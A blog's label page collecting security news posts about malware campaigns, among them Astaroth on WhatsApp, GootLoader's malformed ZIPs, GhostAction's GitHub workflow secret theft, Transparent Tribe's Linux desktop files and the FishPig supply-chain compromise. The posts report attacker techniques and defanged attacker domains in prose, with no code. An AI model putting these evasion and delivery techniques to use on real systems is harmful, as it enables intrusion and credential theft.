Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Malicious Files. Show all posts
messages
acronis Astaroth Banking Trojan Astaroth Trojan Cyber Security Cyberattacks Hacking WhatsApp Malicious Files messages

WhatsApp-Based Astaroth Banking Trojan Targets Brazilian Users in New Malware Campaign

 

A fresh look at digital threats shows malicious software using WhatsApp to spread the Astaroth banking trojan, mainly affecting people in Brazil. Though messaging apps are common tools for connection, they now serve attackers aiming to steal financial data. This method - named Boto Cor-de-Rosa by analysts at Acronis Threat Research - stands out because it leans on social trust within widely used platforms. Instead of relying on email or fake websites, hackers piggyback on real conversations, slipping malware through shared links. 
While such tactics aren’t entirely new, their adaptation to local habits makes them harder to spot. In areas where nearly everyone uses WhatsApp daily, blending in becomes easier for cybercriminals. Researchers stress that ordinary messages can now carry hidden risks when sent from compromised accounts. Unlike older campaigns, this one avoids flashy tricks, favoring quiet infiltration over noise. As behavior shifts online, so do attack strategies - quietly, persistently adapting. 

Acronis reports that the malware targets WhatsApp contact lists, sending harmful messages automatically - spreading fast with no need for constant hacker input. Notably, even though the main Astaroth component sticks with Delphi, and the setup script remains in Visual Basic, analysts spotted a fresh worm-style feature built completely in Python. Starting off differently this time, the mix of languages shows how cyber attackers now build adaptable tools by blending code types for distinct jobs. Ending here: such variety supports stealthier, more responsive attack systems. 

Astaroth - sometimes called Guildma - has operated nonstop since 2015, focusing mostly on Brazil within Latin America. Stealing login details and enabling money scams sits at the core of its activity. By 2024, several hacking collectives, such as PINEAPPLE and Water Makara, began spreading it through deceptive email messages. This newest push moves away from that method, turning instead to WhatsApp; because so many people there rely on the app daily, fake requests feel far more believable. 

Although tactics shift, the aim stays unchanged. Not entirely new, exploiting WhatsApp to spread banking trojans has gained speed lately. Earlier, Trend Micro spotted the Water Saci group using comparable methods to push financial malware like Maverick and a version of Casbaneierio. Messaging apps now appear more appealing to attackers than classic email phishing. Later that year, Sophos disclosed details of an evolving attack series labeled STAC3150, closely tied to previous patterns. This operation focused heavily on individuals in Brazil using WhatsApp, distributing the Astaroth malware through deceptive channels. 

Nearly all infected machines - over 95 percent - were situated within Brazilian territory, though isolated instances appeared across the U.S. and Austria. Running uninterrupted from early autumn 2025, the method leaned on compressed archives paired with installer files, triggering script-based downloads meant to quietly embed the malicious software. What Acronis has uncovered fits well with past reports. Messages on WhatsApp now carry harmful ZIP files sent straight to users. Opening one reveals what seems like a safe document - but it is actually a Visual Basic Script. Once executed, the script pulls down further tools from remote servers. 

This step kicks off the full infection sequence. After activation, this malware splits its actions into two distinct functions. While one part spreads outward by pulling contact data from WhatsApp and distributing infected files without user input, the second runs hidden, observing online behavior - especially targeting visits to financial sites - to capture login details. 

It turns out the software logs performance constantly, feeding back live updates on how many messages succeed or fail, along with transmission speed. Attackers gain a constant stream of operational insight thanks to embedded reporting tools spotted by Acronis.
Read more »
Malwares
Cyber Security GootLoader Malicious Codes Malicious Files Malware attacks Malwares

GootLoader Malware Uses Malformed ZIP Archives to Evade Detection

 

A fresh tactic has emerged among cybercriminals using GootLoader, a JavaScript-driven malware installer. Instead of standard compression, they now distribute broken ZIP files designed to slip past digital defenses. These flawed archives exploit differences across decompression programs - some fail to process them, others do so partially. This mismatch lets malicious code stay concealed during scans yet run normally when opened by users. Findings detailed by Expel show that inconsistent parsing logic in software plays right into attacker hands. Hidden scripts activate only when handled by specific tools found on typical machines. 

Starting with a strange structure, these harmful ZIP files combine around 500 to 1,000 smaller archives into one large package. Because of this layered setup, standard programs like WinRAR or 7-Zip cannot properly read them - tools often relied on during malware checks. Due to the confusion they create, automatic detection systems frequently skip examining what's inside. Yet, when opened through Windows’ own built-in decompression feature, the file works without issue. 

That smooth operation lets victims unknowingly unpack dangerous content. Since 2020, GootLoader has maintained a presence among cyber threats, primarily spreading via manipulated search results and deceptive online ads. People looking for official forms or corporate paperwork may unknowingly land on hacked WordPress sites offering infected files. These corrupted archives, once opened, trigger the payload delivery mechanism embedded within the software. Acting as a gateway tool, it paves the way for additional harmful programs - ransomware being one frequent outcome. 

The chain of infection begins quietly, escalating quickly under the radar. By late 2025, Expel researchers noticed subtle upgrades, showing how the attack method keeps shifting. Instead of just stacking archives, hackers shorten key metadata inside ZIP structures - especially tampering with the end of central directory entries. That tweak triggers failures in numerous analysis programs, yet files still open in Windows Explorer. 

Inside the package, unimportant sections get scrambled too, throwing off predictable reading patterns and making automated inspection harder. Researchers refer to this method as "hashbusting," delivering a distinct ZIP file to each target. Every time someone downloads it, differences in the archive's layout and data prevent standard hash checks from working. Even the JavaScript inside changes form with each instance. Detection systems relying on repeated patterns struggle as a result. 

 What makes the delivery hard to catch lies in its method. Rather than sending a typical ZIP archive, attackers transmit the malicious code as an XOR-encrypted flow of data, rebuilt only after reaching the target's browser. It grows by adding copies of itself over and over, expanding until it meets a specific volume - this skirts detection meant for compressed files. After launch, the script runs using built-in Windows tools, skipping any need to unpack completely, so the attack unfolds without drawing attention. 

Once active, it stays on the machine by placing shortcuts into the Windows Startup directory - then triggers further scripts through native utilities like cscript or PowerShell. From there, data collection begins: details about the system get pulled and sent back to distant servers that control the attack, setting up what comes next without delay. 

Although often overlooked, limiting access to built-in tools such as wscript.exe helps block common attack paths. Instead of running scripts automatically, setting systems to display code in basic viewers adds another layer of protection. As seen with GootLoader’s shifts over time, attackers now twist everyday OS functions into stealthy weapons, staying active even when defenses improve.
Read more »
Malware Attack
Cyber Attacks Cyber Hackers Data Leak data security Data Transfer Database Security GitHub leaked sensitive data Malicious Files Malware Attack

GitHub Supply Chain Attack ‘GhostAction’ Exposes Over 3,000 Secrets Across Ecosystems

 

A newly uncovered supply chain attack on GitHub, named GhostAction, has compromised more than 3,300 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The campaign was first identified by GitGuardian researchers, who traced initial signs of suspicious activity in the FastUUID project on September 2, 2025. The attack relied on compromised maintainer accounts, which were used to commit malicious workflow files into repositories. These GitHub Actions workflows were configured to trigger automatically on push events or manual dispatch, enabling the attackers to extract sensitive information. 

Once executed, the malicious workflow harvested secrets from GitHub Actions environments and transmitted them to an attacker-controlled server through a curl POST request. In FastUUID’s case, the attackers accessed the project’s PyPI token, although no malicious package versions were published before the compromise was detected and contained. Further investigation revealed that the attack extended well beyond a single project. Researchers found similar workflow injections across at least 817 repositories, all exfiltrating data to the same domain. To maximize impact, the attackers enumerated secret variables from existing legitimate workflows and embedded them into their own files, ensuring multiple types of secrets could be stolen. 

GitGuardian publicly disclosed the findings on September 5, raising issues in 573 affected repositories and notifying security teams at GitHub, npm, and PyPI. By that time, about 100 repositories had already identified the unauthorized commits and reverted them. Soon after the disclosures, the exfiltration endpoint used by the attackers went offline, halting further data transfers. 

The scope of the incident is significant, with researchers estimating that roughly 3,325 secrets were exposed. These included API tokens, access keys, and database credentials spanning several major platforms. At least nine npm packages and 15 PyPI projects remain directly affected, with the risk that compromised tokens could allow the release of malicious or trojanized versions if not revoked. GitGuardian noted that some companies had their entire SDK portfolios compromised, with repositories in Python, Rust, JavaScript, and Go impacted simultaneously. 

While the attack bears some resemblance to the s1ngularity campaign reported in late August, GitGuardian stated that it does not see a direct connection between the two. Instead, GhostAction appears to represent a distinct, large-scale attempt to exploit open-source ecosystems through stolen maintainer credentials and poisoned automation workflows. The findings underscore the growing challenges in securing supply chains that depend heavily on public code repositories and automated build systems.
Read more »
Transparent Tribe
Cyber Attacks Indian Government Linux OS Malicious Files Pakistan Hacker Transparent Tribe

Transparent Tribe Target Indian Government's Custom Linux OS with Weaponized Desktop Files

 

Transparent Tribe, a cyber-espionage group believed to originate from Pakistan and also known as APT36, has stepped up its attacks on Indian government entities by using malicious desktop shortcuts designed to compromise both Windows and BOSS Linux systems. 

The latest tactics involve spear-phishing emails featuring fake meeting notices. These emails contain desktop shortcut files disguised as PDF documents (e.g., “Meeting_Ltr_ID1543ops.pdf.desktop”). When recipients attempt to open what appears to be a typical PDF, they instead activate a shell script that initiates the attack chain. 

The malicious script fetches a hex-encoded file from an attacker-controlled domain (“securestore[.]cv”), decodes it to an ELF binary, and saves it to the target computer's disk. During this process, the victim is shown a decoy PDF hosted on Google Drive, launched in Firefox, to avoid suspicion.

The dropped Go-based ELF binary then connects to a command-and-control (C2) server (“modgovindia[.]space:4000”), allowing attackers to issue commands, deliver additional malicious payloads, and steal sensitive data. 

Transparent Tribe’s campaign ensures persistence by setting up a cron job that automatically runs the main payload after reboots or process terminations. The malware is equipped with reconnaissance capabilities and includes dummy anti-debugging and anti-sandbox techniques to dodge detection by analysts and automated analysis platforms.

A known backdoor associated with the group, Poseidon, is deployed for deeper intrusion. Poseidon enables long-term access, data exfiltration, credential theft, and lateral movement within compromised environments. 

CloudSEK and Hunt.io, two cybersecurity firms, reported that this sophisticated campaign reflects APT36’s ongoing adaptation—modifying attacks based on the victim's operating system to maximize the success rate and persistence. 

In recent weeks, similar attacks by Transparent Tribe targeted Indian defense organizations using spoofed login pages intended to collect credentials and two-factor authentication (2FA) codes, especially the Kavach 2FA system widely adopted within Indian government agencies. 

The phishing pages, designed to closely resemble official Indian government sites, prompt users to enter both their email credentials and Kavach code. Typo-squatted domains and Pakistan-based infrastructure are consistently used, aligning with the group’s established tactics. 

Recent campaigns have also targeted countries such as Bangladesh, Nepal, Pakistan, Sri Lanka, and Turkey using spear-phishing emails that mimic governmental communication and leverage lookalike pages for credential theft. Another South Asian group, SideWinder, has employed similar techniques, using fake Zimbra and portal pages to gather government users’ login information, illustrating the widespread threat landscape in the region.
Read more »
Zero-day Flaw
Malicious Files nation-state hackers Threat Landscape Vulnerabilities and Exploits Zero-day Flaw

Windows Shortcut Vulnerability Exploited by 11 State-Sponsored Outfits

 

Since 2017, at least 11 state-sponsored threat groups have actively exploited a Microsoft zero-day issue that allows for abuse of Windows shortcut files to steal data and commit cyber espionage against organisations across multiple industries. 

Threat analysts from Trend Micro's Trend Zero Day Initiative (ZDI) discovered roughly 1,000 malicious.lnk files that exploited the flaw, known as ZDI-CAN-25373, which allowed cyber criminals to execute concealed malicious commands on a victim's PC via customised shortcut files.

“By exploiting this vulnerability, an attacker can prepare a malicious .lnk file for delivery to a victim,” researchers at Trend Micro noted. “Upon examining the file using the Windows-provided user interface, the victim will not be able to tell that the file contains any malicious content.”

The malicious files delivered by cybercriminals include a variety of payloads, including the Lumma infostealer and the Remcos remote access Trojan (RAT), which expose organisations to data theft and cyber espionage. 

State-sponsored outfits from North Korea, Iran, Russia, and China, as well as non-state actors, are among those behind the flaw attacks, which have affected organisations in the government, financial, telecommunications, military, and energy sectors across North America, Europe, Asia, South America, and Australia. 

Additionally, 45% of attacks were carried out by North Korean players, with Iran, Russia, and China each accounting for approximately 18%. Some of the groups listed as attackers are Evil Corp, Kimsuky, Bitter, and Mustang Panda, among others.

According to Trend Micro, Microsoft has not fixed the flaw despite receiving a proof-of-concept exploit through Trend ZDI's bug bounty program. Trend Micro did not react to a follow-up request for comment on their flaw detection and submission timeline.

Microsoft's position remains that it will not be fixing the vulnerability described by Trend Micro at this time because it "does not meet the bar for immediate servicing under our severity classification guidelines," though the company "will consider addressing it in a future feature release," according to an email from a Microsoft spokesperson.

Meanwhile, Microsoft Defender can detect and block threat behaviour, as detailed by Trend Micro, and Microsoft's Windows Smart App Control prevents malicious files from being downloaded from the internet. Furthermore, Windows recognises shortcut (.lnk) files as potentially malicious file types, and the system will automatically display a warning if a user attempts to download one.
Read more »
Phishing Campaign
Data Privacy Info Stealer Malicious Files malware Phishing Campaign

MrAnon Stealer Propagates via Email with Fake Hotel Booking PDF

 

FortiGuard Labs cybersecurity experts have discovered a sophisticated email phishing scheme that uses fraudulent hotel reservations to target unsuspecting victims. The phishing campaign involves the deployment of an infected PDF file, which sets off a chain of actions that culminates in the activation of the MrAnon Stealer malware. 

The attackers, as initially reported by Hackread, conceal themselves as a hotel reservation company rather than depending on complicated technical means. They send phishing emails with the subject "December Room Availability Query," which contain fake holiday season booking details. A downloader link included within the malicious PDF file initiates the phishing attempt. 

Following an investigation, FortiGuard Labs experts discovered a multi-stage process involving.NET executable files, PowerShell scripts, and fraudulent Windows Form presentations. The attackers expertly navigate through these steps, using techniques such as fake error messages to mask the successful execution of the MrAnon Stealer malware. 

The MrAnon Stealer runs in the background, employing cx-Freeze to compress its actions and bypass detection measures. Its meticulous approach includes screenshot capture, IP address retrieval, and sensitive information retrieval from various applications. 

MrAnon Stealer, according to FortiGuard Labs, can steal information from bitcoin wallets, browsers, and messaging apps such as Discord, Discord Canary, Element, Signal, and Telegram Desktop. It specifically targets VPN clients such as NordVPN, ProtonVPN, and OpenVPN Connect. The attackers employ a Telegram channel as a means of exchange for command and control. Using a bot token, the stolen data is sent to the attacker's Telegram channel, along with system information and a download link.

As evidenced by the spike of requests for the downloader URL in November 2023, this malware campaign was aggressive and actively running, with a primary target on Germany. The hackers demonstrated a calculated strategy by switching from Cstealer in July and August to the more potent MrAnon Stealer in October and November. 

Users are strongly advised to take cautious, especially when dealing with unexpected emails containing suspicious files, as online vulnerabilities are at an all-time high. Vigilance and common sense are the keys to thwarting cybercriminal activities because they safeguard against the exploitation of human flaws and ensure online security.
Read more »
Threat actors
Android Security Cyber Security Kaspersky Malicious Files Ransomware Threat actors

Threat Actors Distribute Around 400K Malicious Files Every-day to Attack Users


According to one of the latest reports, nearly 4,00,000 new malicious files were apparently distributed every day by threat actors in the year 2022, in order to deceive and attack online users. The report shows a significant 5 percent growth compared to the 2021 data of the same. 

An estimate shared by cybersecurity company Kaspersky reports that almost 3,80,000 of these malicious files were detected daily in 2021, and 122 million harmful files were detected in 2022, an increase of six million from the year before. 

“Considering how quickly the threat landscape is expanding its boundaries and the number of new devices appearing in users' daily lives, it's quite possible that next year we'll be detecting not 4,00,000 malicious files per day, but half a million,” says Vladimir Kuskov, head of anti-malware research, Kaspersky. 

"Even more dangerous is that, with the development of Malware-as-a-Service, any novice fraudster can now attack devices without any technical knowledge in programming," Kuskov continues. 

The research conducted by Kaspersky indicates that the estimated number of ransomwares detected every day grew by 181%, encrypting 9,500 files every day. This is in comparison to the year 2021.  

Kaspersky as well detected a 142 percent hike in the number of Downloaders, which are malware programs designed in order to install malicious and unwanted applications in a device. Windows, among all platforms, remained the most common platform used by threat actors that are affected by the threat families. 

Experts at Kaspersky, on the other hand, have detected 3,20,000 new malicious files that are responsible for attacks on Windows devices, in 2022, the report added.

Moreover, the Kaspersky experts have witnessed a 10 percent hike in the distribution of malicious files, attacking Android platforms and devices each day in the year 2022.  

Read more »
Sites
Extensions FishPig Malicious Files malware Sites

Malware Spreads Through FishPig Distribution Server to Infect Magento-Powered Stores

 

For several weeks, Magento stores have been infected with malware as a result of a supply chain attack on the FishPig distribution server. FishPig specialises in Magento optimizations and Magento-WordPress integrations, and its Magento extensions have received over 200,000 downloads. FishPig issued a warning on Tuesday about an intrusion into its extension licence system that resulted in a threat actor injecting malicious PHP code into the Helper/License.php file. 

“This file is included in most FishPig extensions so it is best to assume that all FishPig modules had been infected,” FishPig announced.

The hackers likely had access to the company's servers since at least August 6, according to the company. As per Sansec security researchers who discovered the intrusion, the injected code would install another piece of malware called Rekoobe, which would hide as a background process on the compromised servers.

Sansec further told that the malicious code injected into License.php would download a Linux binary from license.fishpig.co.uk every time the Fishpig control panel is accessed in the Magento backend. The downloaded file, named 'lic.bin,' appears to be a licenced asset, but it is actually the Rekoobe remote access trojan.

The trojan removes all malicious files from the infected machine after execution, but it remains in memory, impersonating a system service while waiting for instructions from its command and control (C&C) server, according to the researchers. FishPig claims that the malicious code has been removed from its servers and that all modules have been updated.

“It is recommended to upgrade all FishPig modules or reinstall existing versions from the source, regardless of whether or not you are using extensions known to be infected. This will ensure clean and secure code on your system,” FishPig announced.
Read more »
Subscribe to: Comments (Atom)